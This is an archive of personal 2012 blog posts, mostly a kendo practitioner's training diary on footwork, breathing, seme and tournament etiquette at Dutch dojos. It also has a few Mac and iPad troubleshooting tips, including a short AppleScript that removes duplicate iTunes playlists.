While walking to the office this morning I did have a realization: one of the worst things I was doing, was not stonewalling my opponents' attacks. Either I sidestepped and counter attacked, or I kept moving backwards to evade. Instead, I should receive their attacks in place and counter immediately.


kilala.nl tags: , ,

View or add comments (curr. 2)

Tournament prep in Almere

2012-09-29 13:32:00

I don't know why, but our group was a bit smaller today. Six in bogu, five or six without. I guess a lot of folks are off sick. After kata and warming up we proceeded with footwork practice. 

As part of balance exercises we did lunges. 

In all of these exercises, if you feel imbalanced and tend to wobble or keel over, then your footwork is too narrow. When lunging, keep your feet at kamae-width and sink deep. Hold a straight back.

After this followed laps of suriashi around the hall.

Loyer-sensei and Kris-fukushou inform us that the problems are twofold. For one, most of us aren't properly launching themselves with the left foot. Either we're not kicking hard enough, or we're kicking backwards after launching. Many of us also lift the right foot way too high when lunging forward. Not only does this clearly signal your intentions to your opponent, but it also slows you down. As Kris pointed out, many of us don't stomp their right foot for forward speed but we come to a full stop because we kick downward or even forward. 

While the beginners renewed their focus on kirikaeshi and kihon, we practiced a few waza.

When attacking, imagine your goal to be two meters behind your opponent! Don't strike and immediately dash aside. Worse yet, don't immediately turn towards him! Rush through them and if they get in the way, go into taiatari. Don't hold your hands too high, as they'll simply topple you. "Tsuba into the mouth", as they say.

Finally, because tomorrow is a tournament day: the practice shiai! I joined Nick and Hudaifa, against Charel, Jeroen and Sander. After each round, both kenshi quickly received some pointers on their own kendo from Kris and Loyer-sensei. In my case:

Because we don't have much experience with tourneys we also went over the basic etiquette. Both teams decide the order of kenshi, one through five (or three as is the case tomorrow). Only the first kenshi will be wearing his men from the start. The teams greet each other, then retreat to their side of the court. Everyone except the first sits down and pays attention to the fights. Numbers two and three will start putting on their men. Four and five will follow later. Then, each participant will continue as follows.

  1. Step into the shiaijo. Step to a position from which you can reach your starting line with three paces. 
  2. Bow to your opponent.
  3. Three steps to your line, right foot on the line. Not over, not in front, on the line. In your steps, draw your shinai and go into sonkyo
  4. Do not rise until the shinpan provide the command to "Hajime!".
  5. Return to your line when a point has been made.
  6. If something is wrong, raise your hand. Both kenshi return to their line, while the shinpan find out what is up. If you need to disrobe, both kenshi step back and the other waits in sonkyo while you fix whatever is wrong. 
  7. When the match has been won return to your line. Sonkyo and put your shinai away.
  8. Five steps back. Bow. Step out of the shiaijo backwards and take your seat. 

The Nanseikan kendo dojo has a more complete article on the subject of shiai etiquette.


kilala.nl tags: , ,

View or add comments (curr. 0)

On the importance of upkeep

2012-09-27 20:23:00

After last week's lecture on the importance of shinai maintenance you would think that people would actually take note. But no, sadly they don't. Last saturday I spent a good ten minutes inspecting and fixing one of our youngest members' shinai, despite having shown him how to do it and providing him with a printed booklet with instructions. He has two shinai at his disposal, the first one was in shreds and the latter was only a little bit splintered. So I took that one outside with my toolkit, also forbidding him to use the other one until it was fixed.

Sadly, many of the other members show only little more interest in maintenance. I have tried a number of ways to get them more involved, but without wanting to overstep my station I haven't had much success. The biggest "win" so far was when four of us had a great evening, doing maintenance on all of our equipment :) I'd love to repeat that sometime soon. 

For now I'll do upkeep tonight, because I've got a tournament coming up! ( ^_^)

Sunday I'll be joining five other guys from Renshinjuku at the Fumetsu Cup tournament. I won't be in a team with them, as the Fumetsu Cup pits randomly selected teams against eachother. Who knows who'll be your teammate?! :D Of course, if I want to compete my shinai need to be in tiptop condition. 

Last tuesday we had mandatory inspection at Renshinjuku Amstelveen and one of my shinai was sent back because of a tiny, beginning splinter. A quick repair later it was accepted, but I'll definitely go over both shinai with a fine toothed comb :) Ironically the shinai I loaned to Jeroen-sempai had no issues in QA. 


kilala.nl tags: , ,

View or add comments (curr. 0)

A session dedicated to seme-to-men

2012-09-26 20:43:00

Seme to men

Last night's class was envigorating and I went home feeling energized and ready for two more rounds of keiko! ( ^_^) Jeroen-sempai, who joined me for the first time, came away with similar feelings.

Class was started in the usual fashion, with stretching, running and suburi. In hayasuburi, Heeren-sensei admonished some of the kenshi (definitely me!) for not bringing the shinai back against the buttocks in every single suburi round, as it is a helping hand in figuring if your swings are going down the center line. So thirty more hayasuburi it was! :D

The first ten to fifteen minutes of the day's lesson were fully spent on explanation. The crowd gathered around Heeren-sensei and Kiwa-sempai who demonstrated a number of things.

They also took a lot of time explaining the physical aspects of seme to men ("pressure and men"). An excellent read on seme would be Stephen Quinlan's "The fundamental theorem of kendo?". Funny how mr Quinlan's writings keep popping up in my studies!

In this particular exercise we would be stepping in deep, so deep as to almost pierce our opponents navel. While stepping in, our shinai would go through the center (do not push your opponent's shinai aside), thus sliding on top or over the opponent's shinai. Our kensen will be held low, as to disappear from our op's view. From this position, we would proceed to strike oki-men. The rough sketches above show this: step in deep, not just a little bit and keep the kensen low, not high. 

After the theoretical part of class we proceeded with practice. We did nothing but kirikaeshioki-men and seme to men. Oh yes, a few rounds of uchikomi geiko as well. A very interesting class indeed! And because we were using the system where 2-3 students match up against one motodachi I was able to regulate my breathing well enough to make it 100% through class, including three rounds of keiko. In jigeiko I was matched up against mr. Mast (visiting), Kiwa-sempai and Lennart-sempai. In none of these fights did I have the feeling I was doing particularly well, but I did my best to keep in mind the day's lessons as well as Kris' recent lecture about my standard keiko mistakes. 

It was pointed out that the seme movements we had been practicing do not only serve a big role in shiai and jigeiko, but that they are also very useful in uchikomi keiko. This was demonstrated by Kiwa-sempai who repeatedly got very close to Heeren-sensei before striking the designated targets. 

My seniors also pointed out flaws in my kendo.

I'm sure there was more, but it's hard to recall everthing :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo in Almere: also adjusting our regimen

2012-09-22 21:37:00

Starting this season, Loyer-sensei and Kris-fukushou have indicated that they would like to start using a regimen similar to that used at Museido kendo dojo (which is where Kris originally hails from). Among others, this means that:

One of the advanced waza that we practiced was maki-tsuki-men, using the spinning shinai from maki waza to open the road for a tsuki. The stab at the throat is not the goal for ippon, but used to push into a strike on men. While we went through our practice, the beginners were led by Bob-sempai in learning kirikaeshi, which we then later practiced with them. I was very impressed by Herman-kouhai's performance, whose kirikaeshi was better than mine! His strikes were very precise!

Loyer-sensei took me aside for two pointers:


kilala.nl tags: , ,

View or add comments (curr. 0)

Upping the game at training

2012-09-15 16:38:00

So far, I'm loving this season!

This morning both Ton-sensei and Kris-fukushou returned to teach class. Kris joined the in-bogu group, while Ton-sensei trained the beginners. Kris, knowing that two or three of us want to actively participate in more tournaments this year, decided to start pushing us more. And what a great class it was!

We started on a bit of an embarassing down-note though. A show of hands by Kris proved that roughly five out of the nineteen kendoka present have actually performed shinai maintenance over the summer holiday. We were all warned to do our upkeep as it's for everybody's safety!

First up, our usual warming-up routine was followed by more men suburi. Every single kendoka was told to sound off ten strikes, meaning that we were to do 190 men strikes in a row! Wow! Sadly, I was the only one who couldn't keep up. I had to stop for a very short breather after 60, 100 and 150 strikes. It's awesome that the rest of the group managed to finish the exercise!

After that, footwork! Suriashi, variable suriashi, suriashi with hiki-fumikomi and finally "snaking" along the lines on the floor, practicing forward and sideways suriashi. It's during the snaking that I slightly twisted my ankle :)

Then, onwards to the rest of practice! Kirikaeshi, oki-men, oki-kote-men, hayai-kote-men, ai-men, maki-waza, maki-tsuki, hayai-kote with sidestep, debana-kote, all interspersed with five bouts of jigeiko. Afterwards, three rounds of uchikomi-geiko. So while last class in Amstelveen allowed for some breathers, today's class in Almere was killer. 

One important thing that Kris pointed out to both Martijn and myself: in keiko, we tend to "dance" around each other after strikes, instead of striking and rushing through the opponent. That's really bad and shows zero zanshin.

Unfortunately I had to bow out from one jigeiko and halfway through another one, but still I'm pretty happy with how things turned out. Onwards to the Fumetsu Cup in two weeks' time!


kilala.nl tags: , ,

View or add comments (curr. 0)

Back in bogu, a great class!

2012-09-12 08:16:00

Last night was my return to the Amstelveen dojo, after missing this season's first class due to standby duties. It really was an awesome class!

After putting myself back into the beginners' group in June, I'd been putting off getting back into bogu. Kendo class in Amstelveen is hard work and after my experiences from last season I was fearing another collapse. So instead I just dawdled in the beginners' section. I actually DID want to get back to real fighting though! So I weaseled around my anxieties!! Knowing beforehand that he would approve, I asked Roelof-sensei if he'd allow me back into bogu. It was also a great help that Mischa-sempai indicated that he thought I was being scared of bogu and that I should get back in :) So I did.

At the beginning of the season, Heeren-sensei informed all Renshinjuku kendoka that he would be demanding a higher level of performance from everyone. This would include an emphasis on proper etiquette, on perseverance and on attendance. It would also involve a more traditional training method which, let me tell you, was very helpful to me last night!

In the previous season, we would line up all kendoka against eachother, making a big line of duos. After each practice we'd all move up one slot, thus facing another partner. What this does is ensure diversity, but it's also pretty harsh: there are zero breathers and you also often pit beginner-against-beginner. The more traditional approach that we used yesterday is the motodachi system: seven of our higher dan-graded members and teachers line up and everyone is divided into small groups being pitted against them. This ensures that everyone only fights high level teachers, that people get the chance for a short breather and that you get plenty of mitori geiko (learning by watching). Without this system I would've dropped 'dead' halfway through class, instead of nearly making it to the end :) Hence I made sure to let Heeren-sensei know that I really enjoyed this schedule.

Practice, and some of the pointers I received, were:

Ten minutes before the end of class, after my last round of kihon with Bert-sempai, I caved. I wasn't breathing properly anymore and knew that if I pushed on I'd collapse. I asked permission from Heeren-sensei to bow out, which he gave. While the rest of class finished their kirikaeshi, I did breathing exercises to both regain my breath and to prevent a panic attack. Everything turned out well and I was feeling good again after dressing.

What a great class! I'm looking forward to Saturday and next Tuesday!


kilala.nl tags: , ,

View or add comments (curr. 0)

First class of the season, no sensei

2012-09-08 14:03:00

Last tuesday the new kendo season started and today was the first scheduled class in Almere. We got off to an odd start, what with all three of our sensei being absent: holiday, holiday and holiday(?). So instead, Charel-sempai and Mischa-sempai (who is 2nd dan) took charge of our group. All in all they fared pretty well! Our group usually is (too) low on discipline and so a lot of people are chatty, but they managed to reel them in (with a little occasional support from Nick-sempai and myself).

In the absence of our usual teachers, we focused on basics. Charel and Mischa had both attended the recent summer seminar and were eager to transfer a few of the things they learned. 

An interesting class indeed and I'm very grateful for the help of Charel and Mischa.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo season 2012/13

2012-09-04 22:00:00

Ten scratches on the wall

Tonight marks the start of the 2012/13 kendo season. Unfortunately I'm on standby shift for $CLIENT, so I couldn't make it to the first class in Amstelveen. 

Instead I did my detention work, given to me a few weeks ago by Heeren-sensei for posting a Japanese balad to Facebook :) I can't help it, I just love "Kogarashi ni dakarete". In turn, he told me to do thirty minutes of kirikaeshi (video). It's a bit late, but it was a good start for the season. I did ten repetitions of three minutes, which is ten times four kirikaeshi. The last two repeats were hard, but it was worth it. 

Onward into the new season! /o/

I'm considering enroling for the Fumetsu Cup, which is on the 30th of september.


kilala.nl tags: , ,

View or add comments (curr. 0)

A night of volunteer work

2012-08-31 22:45:00

My classic hifi gear

Thanks to the combined efforts of my dear Marli and our awesome buddy Kaijuu my study in the attic now has a nifty hifi setup. You may recall that Marli brought home a record player, an amp and boxes full of records. Well, recently Kaijuu set me up with two of his old Technics speakers which, despite being huge and looking worse for wear, still provide excellent sound. So thanks to them, tonight's volunteer work is accompanied by Back, Dvorak and a selection of operetta. Sadly, both the record player and the amp are showing their age: on some records the audio sounds rather fuzzy and the needle picks up plenty of pops and ticks. Hopefully that's something we can work on the next few months.

I'm hard at work this Friday night, working on the new Renshinjuku website! I'm putting the final touches to the set of plugins and am translating all content to dutch as well. I was very happy to learn about qTranslate, a Wordpress plugin which makes multi-lingual websites a snap! Couldn't have done it without qTranslate!

Once I'm done, there's admin-work to be done: write a manual for our dojo officials, provide documentation and then hopefully we can quickly migrate the site to production.


kilala.nl tags: , ,

View or add comments (curr. 0)

Getting back in the game

2012-08-22 11:14:00

As I wrote last week I've been lazy. So to get back into the game I'm teaming up with my sempai Jeroen and Martijn.

Last night, Jeroen visited for an hour of kendo and muscle training (followed by some geekery). Aside from the basic stretching and suburi, he taught me some things about pushups, in order to improve the muscles in my shoulders and arms. The basic regimen to start me off is X reps of 5x normal, 5x wide, 5x narrow, which ought to get me started. Many thanks for that! Now all I need to do is follow through and actually DO this stuff.

My form and breathing in kendo are improving again, back towards their old state, but it requires constant reminding. I need to actively think of every step, to ensure I'm doing it right. After going for 100 hayasuburi (which Martijn achieved last week) my blistered left hand blistered some more and drew blood. Jeroen sempai made it to 130/140, while I caved around 70 :| That was down to my technique, because I started really shoving and yanking my shinai after 50, when my arms got tired. Form, form, form!

Three more weeks until class starts again in Almere (or two until Amstelveen). Need to get cracking!


kilala.nl tags: , ,

View or add comments (curr. 1)

My laziness messed up my sport

2012-08-18 20:08:00

Last thursday, I picked up my shinai for the first time since our last class in early July. I suck. A month and a half without sports has messed up my form, my condition and my perseverence. It was weird feeling a hurdle to start again and I didn't like it because kendo is something I want to do!

Practicing suburi with Martijn, I noticed that I've lost everything I've learned in the past few months: I was holding my breath, I was blocking my neck and shoulders and I was pulling/pushing with my right hand. 

I felt so frustrated and disappointed with myself. Because they only reason this happened is because I let it. So the only thing to do is to pick everything up again and get back to training! And instead of training with anger in my mind, I will use mokuso and relaxation practices (from my anxiety training) to get rid of it first.

I will pick up the Couch to 5k program again. Last tuesday my sempai Jeroen (middle in the picture above) went for a run with me, which I really appreciated! At seventeen he's über-sporty and I enjoy training with him as he's gently supportive :) This morning I went for another run, using week 3 from Easy into 5k (instead of week 2 which I did on tuesday). Tuesday I was knackered, but this morning went fine.

Time to get going!!! /o/


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Basics, basics, basics

2012-07-10 22:18:00

First up: Marli kicks ass! Today she did her fifth repeat of the W1Dx of Ease into 5k. Today was the first time that she officially, completely, without any workarounds ran the plan 100% /o/ Impressive, for someone who has always hated running and who's been so-so about sports. I'm really proud. 

She's indicated that she would really like to finish the whole program, to get to running 5k. And after that? Would you believe that she dreams of working towards a marathon? Wow! In her words, "If the forty-something out-of-shape guy who started this whole 5k program thing can do it, so can my twenty-something out-of-shape self!"

So, while she's working on the basics, so am I... Tonight I again joined the beginners' group in Amstelveen to work on basic kendo. We did nothing but oki-men for the first forty minutes. Followed by oki-kote. I'm sad to say that the three of us were a bit brutish on Onno-sempai :| After that we practice hayai-men, hayai-kote and kote-men with Kortewijn-sempai. From all of that the take-aways for me were:

Roelof-sensei made a funny analogy: kendo is like learning the piano. Your first year is learning the scales, your second year is chopsticks, your fifth year you're banging out Liszt. :D


kilala.nl tags: , , ,

View or add comments (curr. 0)

Learning about dojo layout

2012-06-24 13:56:00

Renshinjuku kendo dojo layout

I've been working on a new project for the Renshinjuku kendo dojo: a few months ago Heeren-sensei asked me to come up with some ideas for renewing the dojo's website. The past week I spent a few evenings putting together a new website, based on Wordpress. Part of this concept is a page providing details about the training locations: basic info, a Google Map and drawings of the dojo layout.

Making sketches of building layouts isn't a very hard job. Half an hour doodling with OmniGraffle gave me the basic drawings. But it's thanks to the great website of mr. Dillon Lin that I could fill in all the proper names! Mr. Lin's dillonlin.net site does in-depth articles of kendo dojo, both famous and local. It's a joy to read about kendo dojo from an architect's point of view, going into building design, flooring structure and history. 

His article "Basic Dojo Layout" provided me with most of the terminology I needed for my own sketches.

In the image above, the building on the left is our Amstelveen dojo, while the building on the right is the one in Almere. The prior is situated in a local sports facility from the 70s/80s, while the latter is in a brand-new high school building. While the facilities in Almere are much more modern compared to Amstelveen, the concrete+rubber floor in Almere is sub-optimal compared to the suspended wooden floor of A'veen. 


kilala.nl tags: , , ,

View or add comments (curr. 1)

Awesome session at Renshinjuku Almere

2012-06-23 18:52:00

Holy wow, today's class was awesome! After being absent from the Almere dojo for five weeks, this was a great day to return!

  1. We had twentyfive people in attendance! So many!
  2. We have so many newcomers and rookies! Kendo in Almere is growing :)
  3. We had two visiting nidansha, from the Amstelveen dojo.
  4. We fought, fought and fought some more.
  5. I was worn out! :D

Entering the dojo around 09:10 I was amazed! Already the room was packed and not everyone was there yet. We had barely enough room to practice kata while the newbies were doing kihon practice. Warming up was even tighter packed, with everyone in a circle. The group was pressed up against all the walls and not half an hour into class we threw open the fire doors for some fresh air. ( ^_^)

As Jeroen had already pointed out to me, class changed a little bit. After warming up we immediately put our gear on (skipping the footwork practice we usually do) and went into kihon and waza practice. Oki-men, hayai-men, oki-kote, kote-men, oji-kote and oji-men. After that: jigeiko! While Kris spent some time with the nidansha, we were told to hold two-minute fights amongst ourselves. 

I fought Sander and Jeroen: those fights were awkward insofar that both fighters kept on pushing and ramming against eachother instead of "talking". I also let Ramon practice oki-men on me some more :) Then, as I took a short breather by the fire exit, Kris was ready with his coaching and he was itching for a fight! So he grabbed me and we went at it for five minutes!

I was spoilt! To get five private minutes with Kris! If anything, what that time taught me about my keiko is that I am now stuck waiting and not paying attention, instead of my original flaw: simply rushing in. Kris would be wide open and I'd just be starting him in the eyes. Or his shinai would be this -><- close to me, deep within my ma'ai and I wouldn't even notice that he'd krept so close!

Class went into overtime (we finished twenty minutes) late, because the whole group was run through no less than five rounds of uchikomi geiko! Followed by all kendoka in bogu doing a round of kakari geiko against Kris. Afterwards I was spent, but I haven't felt this good in a long while! :D

A great class! :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Photostream: how to restart the agent after sleep

2012-06-22 20:38:00

Finally! I have finally figured out how to restart the PhotoStream agent, after waking my Macbook from it's sleep!

After figuring out how to access the PhotoStream data through Finder, I now needed a way to trigger a synchronization in the Stream. Normally, after setting up PhotoStream in OS X system preferences, the agent software will be started when you login to your desktop. However, this says nothing about potential restarts after sleeping your Mac. 

First I dug around in launchd / launchctl and quickly discovered the full name of the agent: com.apple.photostream-agent

After that, things got difficult as I couldn't find any configuration file to load the agent with once it had been kicked out of launchd. So you can launchctl [stop|start] all you want, but once you launchctl unload I cannot load the agent back in. 

I found that the actual agent appears to be an application in /Applications/iPhoto.app/Contents/Library/LoginItems. There you will find PhotoStreamAgent.app, which can be ran and which will in fact load com.apple.photostream-agent. However, this will not be the vanilla one, but one with an extra label in front of it. 

Mmm, this doesn't seem to work properly yet. I'll need to do some more researching. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Practicing the basics: footwork, oki-men and breathing

2012-06-20 12:23:00

As I wrote recently: it's highly important that I strongly focus on the basics for the next few weeks. Last night and hopefully one or two more nights this week, I'm focusing on:

So. Nothing special during home training this week (or next), just grinding the millstone on essential basics.


kilala.nl tags: , ,

View or add comments (curr. 2)

Sure, let's give it a try

2012-06-16 20:01:00

HG Sportkleding luchtjes

It's not often that Marli gets excited about cleaning commercials. While I was making tea in the kitchen, she excitedly "Ooh! Ooh! Ooh!"s me back into the living room and rewinds the PVR. It was an ad for HG's detergent for sports clothing

As we all know kendo stinks. Kendo armour gets a bit smelly, kendo gloves can get pretty bad and my keikogi (the jacket) is godawful every single week. Hence Marli's enthusiasm. Let's give it a shot then :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

Back to basics in kendo

2012-06-12 22:21:00

It is my intention to train without bogu at Amstelveen, for the next few weeks: back to basics!

After last week's class eye-openers I've asked Roelof-sensei to take Miyahara-sensei's remarks into account, so we can ensure that the two basic flaws in my kendo can be remedied:

  1. My breathing
  2. My footwork, esp the stepping through after fumikomi

I am glad that he agreed and I had a great class tonight. After going over all of the basic stances, I practiced suriashi with the other bogu-less kendoka. In between, we watched the advanced techniques being explained by Makoto-sempai and the others. This included the differences between de-gote, nuki-waza and kaeshi-waza (some of which is still vague to me, so I need to do some reading!).

During our practice of oki-men, Roelof-sensei also grabbed my shoulder. He saw a big flaw in my timing and he would only let me move forward or backward at the exact right, time. This timing is way different from what I've been using on large men-strikes so far! In this case, the right way to do it, is to only start moving once you're already halfway through your downswing. Because only then is the distance that the shinai needs to travel, equal to the required instep and fumikomi! This is was Kris-fukushou has been trying to get me to understand! He always told me to "step in later!", but it never clicked -when- this "later" was :)

Other people who helped a lot:

Saturday I can finally join class in Almere again. After oodles of family and work events, I'm back to training in my home town. I'm ready to kick some ass! And to get my ass kicked! ( ^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

Two big eye openers during kendo class

2012-06-05 22:48:00

Wow! Tonight was bad. Bad, insofar that I made a lot of mistakes and was "crap" in general. On the other hand it was awesome because I had an epiphany tonight. Two even! I'm very grateful for the sharp eyes of Roelof-sensei and Miyahara-sensei.

The eye openers are:

  1. A huge flaw in my fumikomi.
  2. I finally understand breathing.

First up, during kihon practice (we were doing oki men) Miyahara-san saw something about my footwork. She tried to explain it, but at the time I failed to grasp what she was saying. So after class I went up to her to ask what it was that she saw. 

In my striking of oki men, Miyahara-sensei saw me cross my legs. I do fumikomi on my right, then step past it with left. That's just awful, especially because I do not even feel it happening! I honestly thought I was sticking to suri-ashi! It is such a basic flaw that she told me that she thinks I need to get out of bogu again and keep on practicing the basics. She was taken aback that I do not feel it happening and was sure that this must have shown up before. 

She was right of course! Back in March, Kris-fukushou pointed it out to me during footwork training. And when Marli came to observe our class in January she actually noticed that many of our students have the same problem: fumikomi on right, then cross with the left, then go back to suri-ashi

Second up: it has finally clicked! What Roelof-sensei has been trying to tell me in different words for the past three months has finally clicked! I finally get what he was trying to tell me about my breathing! Regardez, the graph below might be crappy, but it explains what I'm describing below. The blue line is breathing, the red line is striking. It's a rough sketch, so on the second graph the blue line doesn't dip deep enough. Sorry! ( ^_^)

kendo breathing rhythm

It all clicked when Roelof-sensei changed his wording to include one new term: "make sure you have a fluidly rolling breath".

What I've been doing so far was timing my breathing based on my striking: inhale sharply on the upswing and exhale sharply on the strike. This leaves me winded very quickly (as witnessed today where I was worn out after three kirikaeshi and five rounds of kihon). What I instead be doing is breathing naturally in a nice sinoid: in-out-in-out, a nice wave pattern. I should then time my striking based on that: upswing when I near the peak of my inhalation, strike when the exhale starts.

Like the footwork problem described earlier, this is a complete return to the basics. I need to practice A LOT on the very, very basics to get this stuff right! And I need to remember all these things at the same time, to improve them at the same time. It sucks that my memory's so awful and I even forget things within a day. 

I am very grateful that Marli agreed to letting me train twice a week! The extra practice is of course very helpful, but it's also very important that the crowd in Amstelveen is so different: many higher ranking kendoka, who quickly zero in on problems I'm having.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Apple iTunes Match: problem with many copies of same playlist

2012-05-31 19:21:00

Sadly, not all things Apple are awesome. 

While I love the idea of the iTunes Match service, it's wrought with problems. One of the most commonly seen problems is when Match creates dozens if not hundreds of duplicates of a playlist. In my case there are over 500 copies of a "On the go" playlist. This kills performance on iTunes and occasionally also on your iPod / Music iOS application. 

Luckily it's easy to clean up these copies using an Applescript:

with timeout of (45 * 60) seconds
          tell application "iTunes"
                    delete (every playlist whose name is "NAME OF PLAYLIST")
          end tell
end timeout

With many thanks to Apple Support Forum member TRujder who explained the script here.


kilala.nl tags: , ,

View or add comments (curr. 0)

Accessing Photstream without using iPhoto

2012-05-19 17:22:00

Finally! I've been searching for this for quite a while now and I finally found the solution!

Question: "How can I access iCloud Photostream without using iPhoto?"

Answer: "By accessing ~/Library/Application Support/iLifeAssetManagement/assets/sub/ and searching for all images."

Here is the source for this information. The best thing: you can obviously store this procedure as a Saved Search in the sidebar, so you'll always have a shortcut to your Photostream


kilala.nl tags: , ,

View or add comments (curr. 0)

iPad 2 sound issues: headphones work, speakers do not

2012-05-16 09:57:00

Apparently, there are plenty people who experience problems with their iPad2 pertaining to the internal speaker. Specifically: the iPad refuses to play audio and the volume slider does not work. Thanks to some troubleshooting and help from the Apple support fora I've fixed our iPad.

Symptoms:

A lot of people hypothesized that the problems are linked to the upgrade to iOS 5, or that you need to flip the hardware switch settings between "mute" and "rotation lock" a few times.

It's none of that. As forum member Val E Um notes, it's the dock connector: something is causing glitches, causing the iPad to think that it's dock-connected to external speakers. By wiggling a dock cable in the iPad I could make the volume slider appear and disappear. If I wedged the dock connector in at just the right angle, sound kept on working.

The solution: take an alcohol wipe, wrap it around a stiff piece of cardboard and scrape the dock connector on the iPad. Of course, first power down the iPad! After cleaning the dock connector, my sound problems are over :)


kilala.nl tags: , ,

View or add comments (curr. 5)

A tale of two dou

2012-05-12 12:14:00

I felt a bit guilty about going to practice today (having cost us the chance of a nice party last night), so I hesitate to say this: what a great session! /o/

Aside from the fact that my messed up breathing left me winded for 2x2 minutes it went great! We started practice together with the bogu-less kouhai: warmup and kirikaeshi. We then quickly split up to practice basic drills: oki-men, hayai-men, kote-men, ai-men and then the lovely kote-men-taiatari-hikimen-aimen! The biggest reason why my ai-men is failing, is because I pull the shinai waaay too much backwards. I often make the same mistake with a vanilla hayai-men.

And that was that! The rest of class was shiai!

Tomorrow, three teams from Renshinjuku will participate in the annual Edo Cup in Amsterdam. Nick, Bob and Charel sempai will represent the Almere dojo, while Amstelveen will send two other teams. Because of this tournament, Ton-sensei and Kris-fukushou wanted to run through competition preparation again. After the basic etiquette, we got things on the road. For every team member there were two opponents, or three in Bob's case and I went up against him.

They weren't the cleanest hits and I believe that Kris was reluctant to count one of them, but at least I'm happy to be showing some progress. ( ^_^) My fight against Kris went pretty well and I lost because of a stupid mistake: I thought he had landed a valid blow, so I dropped my whole guard, so he hit me again perfectly. Apparently the first blow was in fact not good enough, so that was a valuable lesson I learned: do NOT stop fighting until you are told to do so. 

The biggest problem that Ton-sensei and Kris pointed out is that nobody was 'talking' or building tension with their opponent. Just about everybody just leapt in there, trying to hit stuff. I had very conciously been trying to avoid doing that, but I need more! "Take your time and explore your oponent! Get to know him!" was the big take-away.


kilala.nl tags: , ,

View or add comments (curr. 1)

Exchanging blows with colleagues

2012-05-11 08:00:00

Misleading title FTW. /o/ For once I'm not writing about another colleague I pissed off :p

Yesterday was the annual field trip of my department at $CLIENT. After a last-minute change of plans due to the weather we all gathered at a far-away gymnasium to partake in an introductory class in fencing. Sabre fencing to be specific.

I enjoyed it, fencing's cool! :) If I weren't into kendo already, I would've probably picked up fencing especially because Almere has a rather large club. Reminds me of another company outing, which led to me trying a new sport.

Here's some observations based on my kendo experience:


kilala.nl tags: , ,

View or add comments (curr. 0)

Mitori geiko, round two

2012-05-09 05:59:00

Last night was a valuable class in Amstelveen. From the side lines I might not have been able to hear every single line from the senseis' explanation, but I did get a good hard look and I got the chance to ask questions later. Here's a bunch of things I wrote down.

I also got a chance to talk to Heeren-sensei about some of the stuff I've been working on. Apparently the badges are on their way to the Netherlands now (200x Amstelveen, 100x Almere) and they will be sold at 1 euro a piece!

He also asked me to work with one of our dojo's sempai to improve the kanji writing on the back of the grey shirt. Supposedly my attempt at the kanji looks too Chinese and sensei was asked by a few Japanese whether he was advertising for a new restaurant :P


kilala.nl tags: , ,

View or add comments (curr. 0)

Airport Extreme custom DNS setup issues

2012-05-07 17:55:00

Airport DNS setup

Tonight, it seems that UPC are having DNS issues. I was startled that we even noticed it, because I thought we were using OpenDNS. Not so apparently. When I went to change the configuration of our Airport Extreme I found the DNS IP boxes to be greyed out. WTF?

Turns out that, in the new Airport Utility one needs to do the following:

And presto! It works. No idea why the DNS boxes work that way, but they do. Oh well. At least our DNS problems are over :p


kilala.nl tags: , , ,

View or add comments (curr. 0)

Mitori geiko at Renshinjuku Almere

2012-05-05 16:48:00

Today Marli and I decided against me joining kendo practice: I'm still aching from my wisdom tooth extraction and the medicine they prescribed me is doing me in (diziness, messed up stomach). So today was an ideal moment for mitori geiko: "learning by watching". I've got to admit that, from the sidelines, it's a whole different view! Now that I'm not actively fighting, I have all the time in the world to drink in all manner of small details. 

For starters, because I was the third one to enter the dojo, I got to watch Ton-sensei take Ramon through some of the precise details of kata #2 and kata #3. I have to say that I've always been mightily impressed with Ramon's control of the bokken: he strikes precisely and very fast and of course he stops on target :)

After that I invited kouhai Sven to learn the first kata, after Ton-sensei suggested he ask someone to show him. He learned the shidachi-side of the kata pretty quickly and I hope to take him through #1 and #2 next week. Very impressive: Sven got the eye contact thing down from the get-go! Many starters focus on feet, hands or bokken, but he kept looking me in the eye! Very good!

Once class started I relegated myself to the sidelines. It's funny, the things you notice from there.

There's just so much :)

Tuesday I'll do mitori geiko once more in Amstelveen and by next Saturday I hope to be back in armor again. I'm also planning a social night for some of the guys from Almere, to talk but mostly to do maintenance to our equipment. I'm sad to say that many people never take their shinai apart and only do rough checks along the edges once every while. It's for our friends' safety that we have to check our swords very regularly. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Lots of newbies, few experienced players

2012-04-22 21:07:00

Saturday's kendo class was a great one, though it was pretty out of the ordinary. 

For starters, aside from Ton-sensei there were only four of us in bogu. Martijn, Jeroen, Felix and Aaron were all out of armor due to minor injuries, so that left us with a rather small group of folks actively fighting. While my small group was doing more advanced practice, Martijn and Jeroen took charge of the large group of newbies. There were three folks who'd never been with us before, to check it out. And there's one or two guys who've been tagging along for a few weeks. 

So, what did we do? No footwork practice! After warmup we went straight into kirikaeshi, followed by kihon and waza practice. Most notably: men uchi, fast men uchi, fast kote, fast kote-menharai men, harai kote, harai kote-men and maki waza. Each of these we did for 4x3 repetitions. The last fifteen to twenty minutes of class were spent on jigeiko, where I definitely felt that I was too tense in my arms. How? Because I couldn't stand through more than two geiko and had to be dragged through the third. 

I've said it before and I'll say it again: I'm very grateful for guys as Nick, Charel and Hudaifa who egg me on in a fight. When I pussy out, they tell me to keep going. "Attack just once more! Keep going! I'll let you go once you've scored a point!" Things like that ( ^_^)

The most important thing I'm taking away from this class is something I also realized after taking part in the NK: kendo is a dialogue. I should not just rush in and try to whack at targets. Wait it out. "Talk" to my opponent, so we can decide who gets to score which point. Ton-sensei specifically berated me for rushing in. And Charel-sempai suggested that I simply work towards the ikkyu grading: "It doesn't matter who attacks more, or even who wins! As long as you make good strikes and show good technique, then you'll make progress.".


kilala.nl tags: , ,

View or add comments (curr. 0)

Renshinjuku Kendo clothing

2012-04-19 18:53:00

Two t-shirts

